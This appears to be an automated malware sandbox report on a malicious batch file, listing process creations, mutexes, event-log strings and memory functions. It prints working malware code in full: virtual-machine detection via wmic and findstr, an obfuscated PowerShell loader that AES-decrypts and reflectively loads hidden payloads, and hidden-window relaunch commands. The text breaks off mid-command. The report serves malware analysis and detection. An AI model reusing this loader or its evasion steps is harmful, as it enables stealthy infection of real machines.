Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EAD894
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EA2FF0
Source: C:\Windows\System32\dllhost.exeCode function: 38_3_0000025DC1A9CC94
Source: C:\Windows\System32\dllhost.exeCode function: 38_3_0000025DC1A923F0
Source: C:\Windows\System32\dllhost.exeCode function: 38_3_0000025DC1A9CE18
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140003204
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002434
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140001274
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1ACD894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1AC2FF0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1ACDA18
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CED894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CE2FF0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CEDA18
Source: C:\Windows\System32\winlogon.exeCode function: 39_3_00000225DC61CE18
Source: C:\Windows\System32\winlogon.exeCode function: 39_3_00000225DC6123F0
Source: C:\Windows\System32\winlogon.exeCode function: 39_3_00000225DC61CC94
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC642FF0
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC672FF0
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exeCode function: 40_3_00000202C0ABCE18
Source: C:\Windows\System32\lsass.exeCode function: 40_3_00000202C0ABCC94
Source: C:\Windows\System32\lsass.exeCode function: 40_3_00000202C0AB23F0
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AED894
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AE2FF0
Source: C:\Windows\System32\svchost.exeCode function: 41_3_000002A6612DCE18
Source: C:\Windows\System32\svchost.exeCode function: 41_3_000002A6612D23F0
Source: C:\Windows\System32\svchost.exeCode function: 41_3_000002A6612DCC94
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A661302FF0
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A66130D894
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAEDBCE18
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAEDB23F0
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAEDBCC94
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAED8CE18
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAED823F0
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAED8CC94
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDC2FF0
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE4DA18
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE42FF0
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE4D894
Source: C:\Windows\System32\svchost.exeCode function: 43_3_0000026A8799CC94
Source: C:\Windows\System32\svchost.exeCode function: 43_3_0000026A879923F0
Source: C:\Windows\System32\svchost.exeCode function: 43_3_0000026A8799CE18
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879C2FF0
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F4D894
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F42FF0
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F4DA18
Source: C:\Windows\System32\svchost.exeCode function: 44_3_000001795377CE18
Source: C:\Windows\System32\svchost.exeCode function: 44_3_000001795377CC94
Source: C:\Windows\System32\svchost.exeCode function: 44_3_00000179537723F0
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537AD894
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537A2FF0
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537DD894
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537D2FF0
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_3_0000016CE5E2CC94
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_3_0000016CE5E223F0
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_3_0000016CE5E2CE18
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE653DA18
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE6532FF0
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE653D894
Source: C:\Windows\System32\svchost.exeCode function: 46_3_000002295D53CE18
Source: C:\Windows\System32\svchost.exeCode function: 46_3_000002295D53CC94
Source: C:\Windows\System32\svchost.exeCode function: 46_3_000002295D5323F0
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D56D894
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D562FF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2674
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2682
Source: unknownProcess created: Commandline size = 5344
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2674
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2682
Source: Process Memory Space: powershell.exe PID: 1284, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4828, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.drBinary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.drBinary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}d
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.drBinary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.drBinary string: \Device\NetbiosSmb
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.drBinary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.50.drBinary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.drBinary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.50.drBinary string: C:\Device\HarddiskVolume3`
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.drBinary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.50.drBinary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.drBinary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: System.evtx.50.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.50.drBinary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.drBinary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.drBinary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}l
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.drBinary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: classification engineClassification label: mal100.spyw.evad.winCMD@55/94@1/1
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20241004Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3760:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\2820930
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\4817770
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2756:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4828
Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1284
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\6260321
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_squa0cl3.qra.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 1.cmdVirustotal: Detection: 14%
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4828 -s 2096
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4828 -s 2380
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[